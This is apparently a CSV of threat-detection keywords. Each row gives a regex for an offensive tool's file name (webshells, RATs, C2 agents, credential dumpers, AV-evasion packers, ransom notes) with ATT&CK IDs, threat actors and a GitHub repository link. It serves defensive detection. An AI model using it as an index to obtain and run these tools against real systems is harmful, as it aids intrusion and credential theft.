"*\arsenal-1.2.1.zip*",".{0,1000}\\arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14108"
"*\arsenal-master.zip*",".{0,1000}\\arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14109"
"*\Ask4Creds.ps1*",".{0,1000}\\Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","14110"
"*\Ask4Creds.ps1*",".{0,1000}\\Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","0","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","14111"
"*\asleap.exe*",".{0,1000}\\asleap\.exe.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","14112"
"*\asm\x64\alter_pe_sections*",".{0,1000}\\asm\\x64\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","14113"
"*\asm\x86\alter_pe_sections*",".{0,1000}\\asm\\x86\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","14114"
"*\asm_CelestialSpark.x64.o*",".{0,1000}\\asm_CelestialSpark\.x64\.o.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","14115"
"*\AsmHell.asm*",".{0,1000}\\AsmHell\.asm.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","14116"
"*\ASP.NET Web BackDoor.aspx*",".{0,1000}\\ASP\.NET\sWeb\sBackDoor\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14117"
"*\ASPJinjaObfuscator*",".{0,1000}\\ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","14118"
"*\ASPXspy2.aspx*",".{0,1000}\\ASPXspy2\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14119"
"*\AspxSpy2014Final.aspx*",".{0,1000}\\AspxSpy2014Final\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14120"
"*\asreproasting.c*",".{0,1000}\\asreproasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","14121"
"*\AsStrongAsFuck.exe*",".{0,1000}\\AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14124"
"*\asstrongasfuck.py*",".{0,1000}\\asstrongasfuck\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14125"
"*\AsyncRAT\*",".{0,1000}\\AsyncRAT\\.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","14126"
"*\ataDmargorP\:C*",".{0,1000}\\ataDmargorP\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","14127"
"*\atexec.py*",".{0,1000}\\atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14129"
"*\atexec-pro.py*",".{0,1000}\\atexec\-pro\.py.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","14130"
"*\atexec-pro-main*",".{0,1000}\\atexec\-pro\-main.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","14131"
"*\Athena-*.zip*",".{0,1000}\\Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","14132"
"*\AtomLdr\x64*",".{0,1000}\\AtomLdr\\x64.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","14136"
"*\atomsilo.hta*",".{0,1000}\\atomsilo\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14137"
"*\ATPMiniDump.exe*",".{0,1000}\\ATPMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14138"
"*\AttackerMITM.py*",".{0,1000}\\AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","14139"
"*\attackState.cmd*",".{0,1000}\\attackState\.cmd.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","14140"
"*\AtYourService.exe*",".{0,1000}\\AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","14144"
"*\audio\exfiltrator.py*",".{0,1000}\\audio\\exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","14145"
"*\AutoBlue-MS17-010-main*",".{0,1000}\\AutoBlue\-MS17\-010\-main.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","14146"
"*\AutoCrypt.ahk*",".{0,1000}\\AutoCrypt\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14147"
"*\autodiscover\brute.go*",".{0,1000}\\autodiscover\\brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","14148"
"*\autoNTDS.py*",".{0,1000}\\autoNTDS\.py.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","14162"
"*\AutoPwnKey-main*",".{0,1000}\\AutoPwnKey\-main.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14163"
"*\AutoRecon-main*",".{0,1000}\\AutoRecon\-main.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14164"
"*\AutoSmuggle\*.cs*",".{0,1000}\\AutoSmuggle\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","14165"
"*\avaddon.txt*",".{0,1000}\\avaddon\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14166"
"*\avetdbg.txt*",".{0,1000}\\avetdbg\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","14168"
"*\avira\getCredsavira.h*",".{0,1000}\\avira\\getCredsavira\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14169"
"*\avira\getCredsavira2.h*",".{0,1000}\\avira\\getCredsavira2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14170"
"*\avoslocker.txt*",".{0,1000}\\avoslocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14171"
"*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","14172"
"*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","14173"
"*\avredweb.py *",".{0,1000}\\avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","14174"
"*\AWAYOKON-readme.txt*",".{0,1000}\\AWAYOKON\-readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14175"
"*\AzureC2Proxy\*",".{0,1000}\\AzureC2Proxy\\.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","14180"
"*\AzureC2Relay*",".{0,1000}\\AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","14181"
"*\AzureHound.ps1*",".{0,1000}\\AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14182"
"*\AzureHound.ps1*",".{0,1000}\\AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","14183"
"*\B0-K RAT Majdi SaaD.exe*",".{0,1000}\\B0\-K\sRAT\sMajdi\sSaaD\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14184"
"*\b64.ps1*",".{0,1000}\\b64\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","14185"
"*\BabelStrike.py*",".{0,1000}\\BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","14186"
"*\Babylon RAT.exe*",".{0,1000}\\Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14187"
"*\Babylon RAT.exe*",".{0,1000}\\Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14188"
"*\BabyShark-master.zip*",".{0,1000}\\BabyShark\-master\.zip.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","14189"
"*\backdoor.bat*",".{0,1000}\\backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14190"
"*\backdoor.exe*",".{0,1000}\\backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14191"
